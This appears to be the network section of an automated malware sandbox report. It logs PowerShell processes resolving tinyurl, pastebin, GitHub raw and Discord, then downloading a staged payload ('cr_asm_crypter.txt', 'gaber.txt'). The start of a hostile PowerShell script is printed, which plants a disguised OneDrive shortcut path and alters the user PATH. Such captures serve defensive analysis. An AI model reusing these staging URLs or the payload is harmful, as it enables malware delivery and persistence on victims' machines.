                                            Oct 15, 2024 16:08:32.540450096 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.540462017 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.548455954 CEST44349712185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:32.548546076 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.580157995 CEST49712443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:32.697130919 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:32.697185993 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:32.697257042 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:32.697650909 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:32.697664976 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.314784050 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.314893007 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.316601992 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.316610098 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.317023993 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.318551064 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.359400034 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.359450102 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.359457970 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.538710117 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.538806915 CEST44349713162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:33.538870096 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.551067114 CEST49713443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:33.654927015 CEST4970480192.168.2.8104.18.111.161
                                            Oct 15, 2024 16:08:37.417275906 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:37.422364950 CEST8049714104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:37.422460079 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:37.423155069 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:37.428107977 CEST8049714104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.044130087 CEST8049714104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.046175003 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.046230078 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.046490908 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.050937891 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.050956011 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.098603010 CEST4971480192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.678014994 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.678102016 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.681592941 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.681598902 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.681829929 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:38.687745094 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:38.731452942 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:39.070935965 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:39.071185112 CEST44349715104.20.4.235192.168.2.8
                                            Oct 15, 2024 16:08:39.071301937 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:39.136986971 CEST49715443192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:39.156378031 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.161555052 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.162822008 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.162990093 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.168090105 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.761147022 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.761382103 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762300014 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762346983 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.762412071 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.762434006 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762456894 CEST4971680192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762689114 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:39.762706041 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:39.766299963 CEST8049716185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.398885012 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.399012089 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.400712013 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.400736094 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.400976896 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.402041912 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.443433046 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.528805971 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529017925 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529068947 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.529093027 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529195070 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529238939 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.529246092 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529335976 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.529378891 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.529385090 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.537163973 CEST44349717185.199.110.133192.168.2.8
                                            Oct 15, 2024 16:08:40.537223101 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:40.552414894 CEST49717443192.168.2.8185.199.110.133
                                            Oct 15, 2024 16:08:44.958748102 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:44.958798885 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:44.958878040 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:44.959382057 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:44.959400892 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.567783117 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.568042994 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.569214106 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.569232941 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.569652081 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.570561886 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.615403891 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.615473032 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.615489006 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.790143967 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.790303946 CEST44349718162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:45.790360928 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:45.792301893 CEST49718443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:50.807578087 CEST4970980192.168.2.8104.20.4.235
                                            Oct 15, 2024 16:08:52.905277014 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:52.905317068 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:52.905399084 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:52.905875921 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:52.905888081 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.510710955 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.510879040 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.512633085 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.512641907 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.512923956 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.514050961 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.559413910 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.559657097 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.559667110 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.748075008 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.748151064 CEST44349719162.159.136.232192.168.2.8
                                            Oct 15, 2024 16:08:53.748259068 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:53.751095057 CEST49719443192.168.2.8162.159.136.232
                                            Oct 15, 2024 16:08:58.890331984 CEST4971480192.168.2.8104.20.4.235
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 16:08:10.199893951 CEST | 57407 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 16:08:10.207844973 CEST | 53 | 57407 | 1.1.1.1 | 192.168.2.8
Oct 15, 2024 16:08:10.977130890 CEST | 55146 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 16:08:10.984246969 CEST | 53 | 55146 | 1.1.1.1 | 192.168.2.8
Oct 15, 2024 16:08:29.613161087 CEST | 65381 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 16:08:29.620660067 CEST | 53 | 65381 | 1.1.1.1 | 192.168.2.8
Oct 15, 2024 16:08:32.688678980 CEST | 56460 | 53 | 192.168.2.8 | 1.1.1.1
Oct 15, 2024 16:08:32.696599960 CEST | 53 | 56460 | 1.1.1.1 | 192.168.2.8
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 16:08:10.199893951 CEST | 192.168.2.8 | 1.1.1.1 | 0x32bd | Standard query (0) | tinyurl.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:10.977130890 CEST | 192.168.2.8 | 1.1.1.1 | 0xa8e1 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:29.613161087 CEST | 192.168.2.8 | 1.1.1.1 | 0x8038 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:32.688678980 CEST | 192.168.2.8 | 1.1.1.1 | 0xe76a | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 16:08:10.207844973 CEST | 1.1.1.1 | 192.168.2.8 | 0x32bd | No error (0) | tinyurl.com |  | 104.18.111.161 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:10.207844973 CEST | 1.1.1.1 | 192.168.2.8 | 0x32bd | No error (0) | tinyurl.com |  | 104.17.112.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:10.984246969 CEST | 1.1.1.1 | 192.168.2.8 | 0xa8e1 | No error (0) | raw.githubusercontent.com |  | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:10.984246969 CEST | 1.1.1.1 | 192.168.2.8 | 0xa8e1 | No error (0) | raw.githubusercontent.com |  | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:10.984246969 CEST | 1.1.1.1 | 192.168.2.8 | 0xa8e1 | No error (0) | raw.githubusercontent.com |  | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:10.984246969 CEST | 1.1.1.1 | 192.168.2.8 | 0xa8e1 | No error (0) | raw.githubusercontent.com |  | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:29.620660067 CEST | 1.1.1.1 | 192.168.2.8 | 0x8038 | No error (0) | pastebin.com |  | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:29.620660067 CEST | 1.1.1.1 | 192.168.2.8 | 0x8038 | No error (0) | pastebin.com |  | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:29.620660067 CEST | 1.1.1.1 | 192.168.2.8 | 0x8038 | No error (0) | pastebin.com |  | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:32.696599960 CEST | 1.1.1.1 | 192.168.2.8 | 0xe76a | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:32.696599960 CEST | 1.1.1.1 | 192.168.2.8 | 0xe76a | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:32.696599960 CEST | 1.1.1.1 | 192.168.2.8 | 0xe76a | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:32.696599960 CEST | 1.1.1.1 | 192.168.2.8 | 0xe76a | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 16:08:32.696599960 CEST | 1.1.1.1 | 192.168.2.8 | 0xe76a | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                            • raw.githubusercontent.com
                                            • pastebin.com
                                            • discord.com
                                            • tinyurl.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49704 | 104.18.111.161 | 80 | 3364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:08:10.242575884 CEST | 164 | OUT | GET /bdhpvpny HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: tinyurl.com
                                            Connection: Keep-Alive
Oct 15, 2024 16:08:10.915129900 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:08:10 GMT
                                            Content-Type: text/html; charset=utf-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt
                                            Referrer-Policy: unsafe-url
                                            X-Robots-Tag: noindex
                                            X-TinyURL-Redirect-Type: redirect
                                            Cache-Control: max-age=0, must-revalidate, no-cache, no-store, private
                                            X-TinyURL-Redirect: eyJpdiI6IjZyYmpuSE9zNTFHTHlIS3BHZkgwVWc9PSIsInZhbHVlIjoiZEtOWVVJdC9HZnBsR25DZGswcU93bDV3NHh0bFVzVkhYakJVZ245eEtIelRUOURZc1hRcjRLNVBoNTFMdDlmVnMzcFNlOXd1V2JSRzZtbDlMTlQ0Tmc9PSIsIm1hYyI6IjU4MDVkMjY3NTNlMTA5NzUxZTQ5MmE4ZGYxNDE1MDRhMTk4Y2M1NWFlNWExYjYwZWFlN2NkNWE4ZWQzYzU0MGEiLCJ0YWciOiIifQ==
                                            X-Content-Type-Options: nosniff
                                            X-XSS-Protection: 1; mode=block
                                            CF-Cache-Status: HIT
                                            Set-Cookie: __cf_bm=UIYJqhLoc_nc8sSbmqYdSsBK_DZLBKpHea9WUwdu2kM-1729001290-1.0.1.1-8E13KOCqDp.Fs.xxAiQIH_bX..sYZpWn8ojcQT8dLjGS_eE1zCK1biE5eefdBYhDl_FRevIdjvP3q5XlI14vrw; path=/; expires=Tue, 15-Oct-24 14:38:10 GMT; domain=.tinyurl.com; HttpOnly
                                            Server: cloudflare
                                            CF-RAY: 8d3061336a5b6c7f-DFW
                                            alt-svc: h3=":443"; ma=86400
                                            Data Raw: 32 37 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d
                                            Data Ascii: 272<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <m
Oct 15, 2024 16:08:10.915235996 CEST | 556 | IN | Data Raw: 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 4e 65 74 68 33 4e 2f
                                            Data Ascii: eta http-equiv="refresh" content="0;url='https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt'" /> <title>Redirecting to https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawer


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49709 | 104.20.4.235 | 80 | 5632 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:08:29.686963081 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
Oct 15, 2024 16:08:30.254349947 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:08:30 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: keep-alive
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 15 Oct 2024 15:08:30 GMT
                                            Location: https://pastebin.com/raw/sA04Mwk2
                                            Server: cloudflare
                                            CF-RAY: 8d3061acae874772-DFW
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49711 | 185.199.110.133 | 80 | 5632 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:08:31.087018967 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
Oct 15, 2024 16:08:31.690565109 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                            Connection: close
                                            Content-Length: 0
                                            Server: Varnish
                                            Retry-After: 0
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:31 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210054-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001312.631755,VS0,VE0
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            Expires: Tue, 15 Oct 2024 14:13:31 GMT
                                            Vary: Authorization,Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49714 | 104.20.4.235 | 80 | 5336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 16:08:37.423155069 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: pastebin.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:08:38.044130087 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
                                            Date: Tue, 15 Oct 2024 14:08:37 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: keep-alive
                                            Cache-Control: max-age=3600
                                            Expires: Tue, 15 Oct 2024 15:08:37 GMT
                                            Location: https://pastebin.com/raw/sA04Mwk2
                                            Server: cloudflare
                                            CF-RAY: 8d3061dd5f2c2e6c-DFW
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            4 | 192.168.2.8 | 49716 | 185.199.110.133 | 80 | 5336 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 15, 2024 16:08:39.162990093 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            Oct 15, 2024 16:08:39.761147022 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
                                            Connection: close
                                            Content-Length: 0
                                            Server: Varnish
                                            Retry-After: 0
                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:39 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdal2120094-DFW
                                            X-Cache: HIT
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001320.701833,VS0,VE0
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            Expires: Tue, 15 Oct 2024 14:13:39 GMT
                                            Vary: Authorization,Accept-Encoding


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            0 | 192.168.2.8 | 49705 | 185.199.110.133 | 443 | 3364 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            2024-10-15 14:08:11 UTC | 231 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txt HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                            Host: raw.githubusercontent.com
                                            Connection: Keep-Alive
                                            2024-10-15 14:08:12 UTC | 900 | IN | HTTP/1.1 200 OK
                                            Connection: close
                                            Content-Length: 7088
                                            Cache-Control: max-age=300
                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                            Content-Type: text/plain; charset=utf-8
                                            ETag: "6e4c41fcadb09e4c44f95bcd21966ae888aebf2d5f8b0bcd34ef015521114ea0"
                                            Strict-Transport-Security: max-age=31536000
                                            X-Content-Type-Options: nosniff
                                            X-Frame-Options: deny
                                            X-XSS-Protection: 1; mode=block
                                            X-GitHub-Request-Id: AC22:294C14:83F2F0:907E59:670E774B
                                            Accept-Ranges: bytes
                                            Date: Tue, 15 Oct 2024 14:08:11 GMT
                                            Via: 1.1 varnish
                                            X-Served-By: cache-dfw-kdfw8210144-DFW
                                            X-Cache: MISS
                                            X-Cache-Hits: 0
                                            X-Timer: S1729001292.922972,VS0,VE75
                                            Vary: Authorization,Accept-Encoding,Origin
                                            Access-Control-Allow-Origin: *
                                            Cross-Origin-Resource-Policy: cross-origin
                                            X-Fastly-Request-ID: b9e0ec7714768b6af4c45549587365f703e829f1
                                            Expires: Tue, 15 Oct 2024 14:13:11 GMT
                                            Source-Age: 0
                                            2024-10-15 14:08:12 UTC | 1378 | IN | Data Raw: 73 6c 65 65 70 20 35 0a 0a 23 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 24 65 6e 76 3a 74 6d 70 5c 44 72 69 76 65 72 44 69 61 67 2e 64 6c 6c 22 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 0a 24 63 75 72 72 65 6e 74 50 61 74 68 20 3d 20 5b 53 79 73 74 65 6d 2e 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 22 50 41 54 48 22 2c 20 22 55 73 65 72 22 29 0a 24 6e 65 77 50 61 74 68 20 3d 20 24 63
                                            Data Ascii: sleep 5#$googoogaagaa = "$env:tmp\DriverDiag.dll"$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {$currentPath = [System.Environment]::GetEnvironmentVariable("PATH", "User")$newPath = $c
